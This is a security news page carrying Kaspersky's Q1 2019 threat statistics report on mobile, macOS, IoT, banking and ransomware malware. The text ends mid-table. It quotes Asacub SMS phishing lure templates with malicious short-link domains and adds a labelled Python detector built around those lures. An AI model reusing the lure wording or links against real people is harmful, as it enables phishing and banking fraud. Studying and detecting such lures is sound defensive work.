Viruses and Worms

We'll hack back at Russians, declare UK ministers in cyber-Blitz blitz

The Register - Anti-Virus - 23 May 2019 - 14:09
NATO's getting in on the action too

British ministers are stepping up their rhetoric on cyber warfare, with £22m to be splurged on embiggening an "offensive hacking" unit as Foreign Secretary Jeremy Hunt vowed to retaliate against Russian cyber-attacks.…


Tor Browser for Android 8.5 offers mobile users privacy boost

Sophos Naked Security - 23 May 2019 - 13:39
After nine months of alpha testing, a stable release of the Tor browser for Android can now be downloaded from Google’s Play store or direct from the Project’s website.

Mozilla fixes bugs, improves privacy in latest Firefox release

Sophos Naked Security - 23 May 2019 - 12:40
Mozilla rolled out version 67 of its Firefox browser this week, fixing some security bugs and introducing a host of privacy features.

The city of Baltimore is being held hostage by ransomware

Sophos Naked Security - 23 May 2019 - 12:31
The mayor said no—for now—to paying 13 Bitcoins to (purportedly) unlock all seized systems. Manual rebuilding could take months.

Phisher folk reel in Computacenter security vetting mailbox packed with sensitive staff data

The Register - Anti-Virus - 23 May 2019 - 12:05
Haul included employee passports, driving licences, bank statements and more

The third-party mailbox used by Computacenter employees and contractors to deposit data for security clearance applications has been hacked and used in phishing scams.…


IT threat evolution Q1 2019. Statistics

Kaspersky Securelist - 23 May 2019 - 12:00

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
  • 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
  • Ransomware attacks were defeated on the computers of 284,489 unique users.
  • Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 905,174 malicious installation packages
    • 29,841 installation packages for mobile banking Trojans
    • 27,928 installation packages for mobile ransomware Trojans
Mobile threats

Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:

{Name of victim}, you received a new mms: ____________________________ from {Name of victim’s contact}
{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim’s contact}
{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim’s contact}
{Name of victim}, you have an mms notification ____________________________ from {Name of victim’s contact}
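
The four lure templates above share one fixed shape (victim name, an MMS or photo notice, a link, a contact name), which is enough to build a message-side detector. The following is an added example, not code from the report or from Kaspersky Lab: it turns the quoted templates into anchored patterns, treats the quoted short-link domains as indicators in their own right, and uses a constructed carrier allow-list (mms.example-carrier.net) and constructed sample messages.

```python
"""Classify SMS bodies against the Asacub lure templates quoted in the report."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Short-link domains quoted in the report's message samples.
ASACUB_LINK_DOMAINS = {"smsfn.pro", "smslv.pro"}

# Assumption: hosts an operator would legitimately use for MMS notifications
# (constructed allow-list; a real deployment would load the carrier's own).
CARRIER_MMS_HOSTS = {"mms.example-carrier.net"}

# The four lure templates from the report turned into anchored regexes;
# "{Name of victim}" and "{Name of victim's contact}" become named groups.
LURE_TEMPLATES = [
    re.compile(r"^(?P<victim>[^,]+), you received a new mms: (?P<link>\S+) from (?P<contact>.+)$", re.I),
    re.compile(r"^(?P<victim>[^,]+), the mms: (?P<link>\S+) was received from (?P<contact>.+)$", re.I),
    re.compile(r"^(?P<victim>[^,]+), photo: (?P<link>\S+) received from (?P<contact>.+)$", re.I),
    re.compile(r"^(?P<victim>[^,]+), you have an mms notification (?P<link>\S+) from (?P<contact>.+)$", re.I),
]

# Matches a bare or schemed URL and captures its host.
URL_RE = re.compile(r"(?:https?://)?(?P<host>[a-z0-9-]+(?:\.[a-z0-9-]+)+)(?:/\S*)?", re.I)


@dataclass
class Finding:
    message: str
    reason: str
    host: Optional[str]


def link_host(token: str) -> Optional[str]:
    """Return the lowercase host of a URL-looking token, or None."""
    m = URL_RE.fullmatch(token.strip().rstrip(".,"))
    return m.group("host").lower() if m else None


def classify(message: str) -> Optional[Finding]:
    """Return a Finding if the SMS looks like an Asacub lure, else None.

    The sender is deliberately ignored: the report describes these texts
    being sent from already-infected phones to their owners' contacts, so
    a trusted sender is no evidence that the message is benign.
    """
    text = message.strip()

    # 1. A known short-link domain anywhere in the body is enough on its own,
    #    whatever the surrounding wording (this generalises the templates).
    for m in URL_RE.finditer(text):
        host = m.group("host").lower()
        if host in ASACUB_LINK_DOMAINS:
            return Finding(text, "known Asacub short-link domain", host)

    # 2. Otherwise require the MMS/photo lure wording from the templates.
    for pattern in LURE_TEMPLATES:
        m = pattern.match(text)
        if not m:
            continue
        link = m.group("link")
        if set(link) <= {"_"}:
            # Placeholder underscores, as in the report's first and fourth samples.
            return Finding(text, "MMS lure with placeholder link", None)
        host = link_host(link)
        if host is None:
            return Finding(text, "MMS lure without a parseable link", None)
        if host in CARRIER_MMS_HOSTS:
            return None  # wording matches, but the link is the operator's own
        return Finding(text, "MMS lure pointing at a non-carrier host", host)
    return None


def scan(messages: List[str]) -> List[Finding]:
    """Classify a batch of SMS bodies and return only the suspicious ones."""
    return [f for f in (classify(m) for m in messages) if f is not None]


# Constructed samples modelled on the report's four templates, plus benign texts.
SAMPLE_MESSAGES = [
    "Anna, you received a new mms: ____________________________ from Ivan",
    "Anna, the mms: smsfn.pro/3ftjR was received from Ivan",
    "Anna, photo: smslv.pro/c0Oj0 received from Ivan",
    "Anna, you have an mms notification http://bit.example/x9 from Ivan",
    "Anna, you received a new mms: https://mms.example-carrier.net/v/42 from Ivan",
    "Anna, photo from our trip: https://photos.example.org/album/9",
    "Your parcel 12345 is out for delivery today",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_MESSAGES):
        print(f"{f.reason:40} host={f.host} :: {f.message}")
```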

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.

Number of detected malicious installation packages, Q2 2018 – Q1 2019

Distribution of detected mobile apps by type

Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019

Among all the threats detected in Q1 2019, the lion’s share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. In Q4 2018 the share of mobile banking Trojans was 1.85% of all detected threats; in Q1 2019 it stood at 3.24%.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

     Verdict                                    %*
  1  DangerousObject.Multi.Generic          54.26
  2  Trojan.AndroidOS.Boogr.gsh             12.72
  3  Trojan-Banker.AndroidOS.Asacub.snt      4.98
  4  DangerousObject.AndroidOS.GenericML     4.35
  5  Trojan-Banker.AndroidOS.Asacub.a        3.49
  6  Trojan-Dropper.AndroidOS.Hqwar.bb       3.36
  7  Trojan-Dropper.AndroidOS.Lezok.p        2.60
  8  Trojan-Banker.AndroidOS.Agent.ep        2.53
  9  Trojan.AndroidOS.Dvmap.a                1.84
 10  Trojan-Banker.AndroidOS.Svpeng.q        1.83
 11  Trojan-Banker.AndroidOS.Asacub.cp       1.78
 12  Trojan.AndroidOS.Agent.eb               1.74
 13  Trojan.AndroidOS.Agent.rt               1.72
 14  Trojan-Banker.AndroidOS.Asacub.ce       1.70
 15  Trojan-SMS.AndroidOS.Prizmes.a          1.66
 16  Exploit.AndroidOS.Lotoor.be             1.59
 17  Trojan-Dropper.AndroidOS.Hqwar.gen      1.57
 18  Trojan-Dropper.AndroidOS.Tiny.d         1.51
 19  Trojan-Banker.AndroidOS.Svpeng.ak       1.49
 20  Trojan.AndroidOS.Triada.dl              1.47

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked.

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system based on machine learning.

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab’s infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company’s security solutions before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

  • It is extremely difficult for an ordinary user to determine whether their device is already infected.
  • Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.

Geography of mobile threats

Map of mobile malware infection attempts, Q1 2019

Top 10 countries by share of users attacked by mobile malware:

     Country*        %**
  1  Pakistan      37.54
  2  Iran          31.55
  3  Bangladesh    28.38
  4  Algeria       24.03
  5  Nigeria       22.59
  6  India         21.53
  7  Tanzania      20.71
  8  Indonesia     17.16
  9  Kenya         16.27
 10  Mexico        12.01

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Pakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.

Second place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy – the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.

Third place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.

Mobile banking Trojans

In the reporting period, we detected 29,841 installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.

The greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.

Number of installation packages for mobile banking Trojans, Q2 2018 – Q1 2019

     Verdict                                  %*
  1  Trojan-Banker.AndroidOS.Asacub.snt    23.32
  2  Trojan-Banker.AndroidOS.Asacub.a      16.35
  3  Trojan-Banker.AndroidOS.Agent.ep      11.82
  4  Trojan-Banker.AndroidOS.Svpeng.q       8.57
  5  Trojan-Banker.AndroidOS.Asacub.cp      8.33
  6  Trojan-Banker.AndroidOS.Asacub.ce      7.96
  7  Trojan-Banker.AndroidOS.Svpeng.ak      7.00
  8  Trojan-Banker.AndroidOS.Agent.eq       4.96
  9  Trojan-Banker.AndroidOS.Asacub.ar      2.47
 10  Trojan-Banker.AndroidOS.Hqwar.t        2.10

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by banking threats.

This time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.

It was a similar story with Trojan-Banker.AndroidOS.Agent.ep: we recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals’ transition to a two-stage system of infection using Hqwar droppers.

Geography of mobile banking threats, Q1 2019

Top 10 countries by share of users attacked by mobile banking Trojans:

     Country*        %**
  1  Australia      0.81
  2  Turkey         0.73
  3  Russia         0.64
  4  South Africa   0.35
  5  Ukraine        0.31
  6  Tajikistan     0.25
  7  Armenia        0.23
  8  Kyrgyzstan     0.17
  9  US             0.16
 10  Moldova        0.16

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

In Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Neither type of malware is exclusive to Australia; both are used for attacks worldwide.

Second place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.

Russia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.

Mobile ransomware

In Q1 2019, we detected 27,928 installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.

Number of mobile ransomware installation packages detected by Kaspersky Lab, Q2 2018 – Q1 2019

     Verdict                                   %*
  1  Trojan-Ransom.AndroidOS.Svpeng.ah      28.91
  2  Trojan-Ransom.AndroidOS.Rkor.h         19.42
  3  Trojan-Ransom.AndroidOS.Svpeng.aj       9.46
  4  Trojan-Ransom.AndroidOS.Small.as        8.81
  5  Trojan-Ransom.AndroidOS.Rkor.snt        5.36
  6  Trojan-Ransom.AndroidOS.Svpeng.ai       5.21
  7  Trojan-Ransom.AndroidOS.Small.o         3.24
  8  Trojan-Ransom.AndroidOS.Fusob.h         2.74
  9  Trojan-Ransom.AndroidOS.Small.ce        2.49
 10  Trojan-Ransom.AndroidOS.Svpeng.snt      2.33

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by ransomware.

In Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.

Geography of mobile ransomware, Q1 2019

Top 10 countries by share of users attacked by mobile ransomware:

     Country*        %**
  1  US             1.54
  2  Kazakhstan     0.36
  3  Iran           0.28
  4  Pakistan       0.14
  5  Mexico         0.10
  6  Saudi Arabia   0.10
  7  Canada         0.07
  8  Italy          0.07
  9  Indonesia      0.05
 10  Belgium        0.05

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

The Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).

Attacks on Apple macOS

On the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.

The modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:

  1. The code that displays the advertising banner to run as often as possible on the infected machine,
  2. The victim to click on the banners as often as possible,
  3. As many victims as possible.

It should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.

Top 20 threats for macOS

     Verdict                              %*
  1  Trojan-Downloader.OSX.Shlayer.a   24.62
  2  AdWare.OSX.Spc.a                  20.07
  3  AdWare.OSX.Pirrit.j               10.31
  4  AdWare.OSX.Pirrit.p                8.44
  5  AdWare.OSX.Agent.b                 8.03
  6  AdWare.OSX.Pirrit.o                7.45
  7  AdWare.OSX.Pirrit.s                6.88
  8  AdWare.OSX.Agent.c                 6.03
  9  AdWare.OSX.MacSearch.a             5.95
 10  AdWare.OSX.Cimpli.d                5.72
 11  AdWare.OSX.Mcp.a                   5.71
 12  AdWare.OSX.Pirrit.q                5.55
 13  AdWare.OSX.MacSearch.d             4.48
 14  AdWare.OSX.Agent.a                 4.39
 15  Downloader.OSX.InstallCore.ab      3.88
 16  AdWare.OSX.Geonei.ap               3.75
 17  AdWare.OSX.MacSearch.b             3.48
 18  AdWare.OSX.Geonei.l                3.42
 19  AdWare.OSX.Bnodlero.q              3.33
 20  RiskTool.OSX.Spigot.a              3.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s security solutions for macOS that were attacked.

Trojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Its main task is to download and install various advertising apps, including Bnodlero.

AdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various “cleaner” programs for macOS. After installation, they write themselves to the autoloader and run in the background.

Members of the AdWare.OSX.Pirrit family add extensions to the victim’s browser; some versions also install a proxy server on the victim’s machine to intercept traffic from the browser. All this serves one purpose – to inject advertising into web pages viewed by the user.

The malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.

AdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim’s browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user’s knowledge.

AdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim’s browser.

The creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.

The AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs its creators’ own obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.

Like other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user’s browser, and changes the default search engine and home page. What’s more, it can download and install other advertising apps.

Threat geography

     Country*        %**
  1  France        11.54
  2  Spain          9.75
  3  India          8.83
  4  Italy          8.20
  5  US             8.03
  6  Canada         7.94
  7  UK             7.52
  8  Russia         7.51
  9  Brazil         7.45
 10  Mexico         6.99

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky Lab’s security solutions for macOS in the country.

In Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.

Users from Spain (9.75%), India (8.83%), and Italy (8.20%) – who ranked second, third, and fourth, respectively – most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.

Fifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.

IoT attacks

Interesting events

In Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: if the malware detected it was running in a sandbox, it stopped working. The implementation was primitive – scanning for the presence of procfs – but we expect it to become more complex in the near future.

Second, one of the versions of Mirai was found to contain a mechanism for clearing the environment of other bots. It works using templates, killing a process if its name matches one of the templates. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain “mirai” in its process name):

  • dvrhelper
  • dvrsupport
  • mirai
  • blade
  • demon
  • hoho
  • hakai
  • satori
  • messiah
  • mips

Lastly, a few words about a miner that uses an old exploit for Oracle WebLogic Server, although strictly speaking it is not IoT malware but a Trojan for Linux.

Taking advantage of the fact that WebLogic Server is cross-platform and can run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.

Section of code responsible for attacking Windows and Linux hosts

IoT threat statistics

Q1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that this has nothing to do with the qualities of the protocol itself. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come.

  SSH      17%
  Telnet   83%

Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019

Nevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This can be seen from the number of sessions in which cybercriminal servers interact with Kaspersky Lab’s traps.

  SSH      64%
  Telnet   36%

Table of distribution of cybercriminal working sessions with Kaspersky Lab’s traps, Q1 2019

If attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.

Telnet-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s telnet traps, Q1 2019

Top 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab’s traps:

     Country          %*
  1  Egypt         13.46
  2  China         13.19
  3  Brazil        11.09
  4  Russia         7.17
  5  Greece         4.45
  6  Jordan         4.14
  7  US             4.12
  8  Iran           3.24
  9  India          3.14
 10  Turkey         2.49

* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet.

In Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab’s traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.

Cybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.

Top 10 malware downloaded to infected IoT devices following a successful telnet attack

     Verdict                              %*
  1  Backdoor.Linux.Mirai.b            71.39
  2  Backdoor.Linux.Mirai.ba           20.15
  3  Backdoor.Linux.Mirai.au            4.85
  4  Backdoor.Linux.Mirai.c             1.35
  5  Backdoor.Linux.Mirai.h             1.23
  6  Backdoor.Linux.Mirai.bj            0.72
  7  Trojan-Downloader.Shell.Agent.p    0.06
  8  Backdoor.Linux.Hajime.b            0.06
  9  Backdoor.Linux.Mirai.s             0.06
 10  Backdoor.Linux.Gafgyt.bj           0.04

* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack.

It is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai’s universality.

SSH-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s SSH traps, Q1 2019

Top 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab’s traps:

     Country          %*
  1  China         23.24
  2  US             9.60
  3  Russia         6.07
  4  Brazil         5.31
  5  Germany        4.20
  6  Vietnam        4.11
  7  France         3.88
  8  India          3.55
  9  Egypt          2.53
 10  Korea          2.10

* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH.

Most often, a successful SSH-based attack resulted in the following types of malware being downloaded to the victim’s device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.

Financial threats

Quarterly highlights

The banker Trojan DanaBot, detected in Q2, continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.

Recall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.

Financial threat statistics

In Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.

Number of unique users attacked by financial malware, Q1 2019

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks, Q1 2019

Top 10 countries by share of attacked users

  Country*        %**
  South Korea     2.2
  China           2.1
  Belarus         1.6
  Venezuela       1.6
  Serbia          1.6
  Greece          1.5
  Egypt           1.4
  Pakistan        1.3
  Cameroon        1.3
  Zimbabwe        1.3

* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 banking malware families

    Name          Verdict                            %*
 1  RTM           Trojan-Banker.Win32.RTM            27.42
 2  Zbot          Trojan.Win32.Zbot                  22.86
 3  Emotet        Backdoor.Win32.Emotet               9.36
 4  Trickster     Trojan.Win32.Trickster              6.57
 5  Nymaim        Trojan.Win32.Nymaim                 5.85
 6  Nimnul        Virus.Win32.Nimnul                  4.59
 7  SpyEye        Backdoor.Win32.SpyEye               4.29
 8  Neurevt       Trojan.Win32.Neurevt                3.56
 9  NeutrinoPOS   Trojan-Banker.Win32.NeutrinoPOS     2.64
10  Tinba         Trojan-Banker.Win32.Tinba           1.39

* Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).

Ransomware programs

Quarterly highlights

The most high-profile event of the quarter was probably the LockerGoga ransomware attack on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.

A vulnerability was discovered in the popular WinRAR archiver (CVE-2018-20250) that allows an arbitrary file to be written to an arbitrary directory when an ACE archive is unpacked. Cybercriminals quickly assembled an archive that drops the executable of the JNEC ransomware into the system's autorun (Startup) directory, so that it is launched at the next logon.

February saw attacks on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What’s more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, created a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

Statistics

Number of new modifications

The number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.

Number of new ransomware modifications, Q1 2018 – Q1 2019

Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.

Number of unique users attacked by ransomware Trojans, Q1 2019

Attack geography

Geography of ransomware Trojan attacks, Q1 2019

Top 10 countries attacked by ransomware Trojans

    Country*      % of users attacked by cryptors**
 1  Bangladesh    8.11
 2  Uzbekistan    6.36
 3  Ethiopia      2.61
 4  Mozambique    2.28
 5  Nepal         2.09
 6  Vietnam       1.37
 7  Pakistan      1.14
 8  Afghanistan   1.13
 9  India         1.11
10  Indonesia     1.07

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 most common families of ransomware Trojans

    Name                 Verdict*                         Percentage of attacked users**
 1  WannaCry             Trojan-Ransom.Win32.Wanna        26.25
 2  (generic verdict)    Trojan-Ransom.Win32.Phny         18.98
 3  GandCrab             Trojan-Ransom.Win32.GandCrypt    12.33
 4  (generic verdict)    Trojan-Ransom.Win32.Crypmod       5.76
 5  Shade                Trojan-Ransom.Win32.Shade         3.54
 6  (generic verdict)    Trojan-Ransom.Win32.Encoder       3.50
